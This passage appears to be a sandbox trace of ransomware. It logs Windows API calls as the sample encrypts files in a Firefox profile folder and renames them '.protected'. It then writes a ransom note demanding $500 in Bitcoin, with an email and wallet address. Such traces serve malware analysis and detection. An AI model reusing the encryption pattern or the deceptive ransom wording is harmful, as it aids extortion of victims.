HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".rar") returned 0x0 [0086.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset") returned 127 [0086.555] StrStrW (lpFirst="test-malware-simple.pset", lpSrch=".zip") returned 0x0 [0086.555] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.556] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.556] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.556] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.556] CloseHandle (hObject=0x158) returned 1 [0086.556] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected") returned 137 [0086.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.pset.protected")) returned 1 [0086.557] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="Windows") returned -1 [0086.557] lstrcmpiW 
(lpString1="test-malware-simple.sbstore", lpString2="Program Files") returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="Program Files (x86)") returned 1 [0086.557] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="$Recycle.bin") returned 1 [0086.558] lstrcmpiW (lpString1="test-malware-simple.sbstore", lpString2="System Volume Information") returned 1 [0086.558] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrIW (lpFirst="test-malware-simple.sbstore", lpSrch=".protected") returned 0x0 [0086.558] lstrcmpW (lpString1="test-malware-simple.sbstore", lpString2="RESTORE_FILES.txt") returned 1 [0086.558] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.558] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".txt") returned 0x0 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".rar") returned 0x0 [0086.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore") returned 130 [0086.558] StrStrW (lpFirst="test-malware-simple.sbstore", lpSrch=".zip") returned 0x0 [0086.559] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.559] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.560] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.560] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.560] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.560] CloseHandle (hObject=0x158) returned 1 [0086.560] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected") returned 140 [0086.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.sbstore.protected")) returned 1 [0086.561] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="Windows") returned -1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="Program Files") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="Program Files (x86)") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="$Recycle.bin") returned 1 [0086.561] lstrcmpiW (lpString1="test-phish-simple.cache", lpString2="System Volume Information") returned 1 [0086.561] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.561] StrStrIW (lpFirst="test-phish-simple.cache", lpSrch=".protected") returned 0x0 [0086.561] lstrcmpW (lpString1="test-phish-simple.cache", lpString2="RESTORE_FILES.txt") returned 1 [0086.561] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 
[0086.561] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".txt") returned 0x0 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".rar") returned 0x0 [0086.563] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache") returned 126 [0086.563] StrStrW (lpFirst="test-phish-simple.cache", lpSrch=".zip") returned 0x0 [0086.563] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.564] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2c, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x2c, lpOverlapped=0x0) returned 1 [0086.564] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.565] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.565] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.565] CloseHandle (hObject=0x158) returned 1 [0086.565] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected") returned 136 [0086.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.cache.protected")) returned 1 [0086.566] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="Windows") returned -1 [0086.566] lstrcmpiW 
(lpString1="test-phish-simple.pset", lpString2="Program Files") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="Program Files (x86)") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="$Recycle.bin") returned 1 [0086.566] lstrcmpiW (lpString1="test-phish-simple.pset", lpString2="System Volume Information") returned 1 [0086.566] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.566] StrStrIW (lpFirst="test-phish-simple.pset", lpSrch=".protected") returned 0x0 [0086.566] lstrcmpW (lpString1="test-phish-simple.pset", lpString2="RESTORE_FILES.txt") returned 1 [0086.566] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.566] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.566] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".txt") returned 0x0 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".rar") returned 0x0 [0086.567] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset") returned 125 [0086.567] StrStrW (lpFirst="test-phish-simple.pset", lpSrch=".zip") returned 0x0 [0086.567] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.568] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0086.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.568] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.569] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.569] CloseHandle (hObject=0x158) returned 1 [0086.569] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected") returned 135 [0086.569] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.pset.protected")) returned 1 [0086.570] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Windows") returned -1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Program Files") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="Program Files (x86)") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="$Recycle.bin") returned 1 [0086.570] lstrcmpiW (lpString1="test-phish-simple.sbstore", lpString2="System Volume Information") returned 1 [0086.570] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.570] StrStrIW (lpFirst="test-phish-simple.sbstore", lpSrch=".protected") returned 0x0 [0086.570] lstrcmpW (lpString1="test-phish-simple.sbstore", lpString2="RESTORE_FILES.txt") returned 1 [0086.570] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0086.570] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0086.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".txt") returned 0x0 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".rar") returned 0x0 [0086.571] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore") returned 128 [0086.571] StrStrW (lpFirst="test-phish-simple.sbstore", lpSrch=".zip") returned 0x0 [0086.571] ReadFile (in: hFile=0x158, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.572] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xe8, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e2d4*=0xe8, lpOverlapped=0x0) returned 1 [0086.572] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0086.572] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0086.572] CloseHandle (hObject=0x158) returned 1 [0086.572] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected") returned 138 [0086.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-phish-simple.sbstore.protected")) returned 1 [0086.573] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0086.573] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0086.573] wnsprintfW (in: pszDest=0x4cfb68, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\RESTORE_FILES.txt") returned 120 [0086.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0086.574] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.574] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0086.575] lstrlenA (lpString="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") returned 684 [0086.575] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.575] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.575] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, 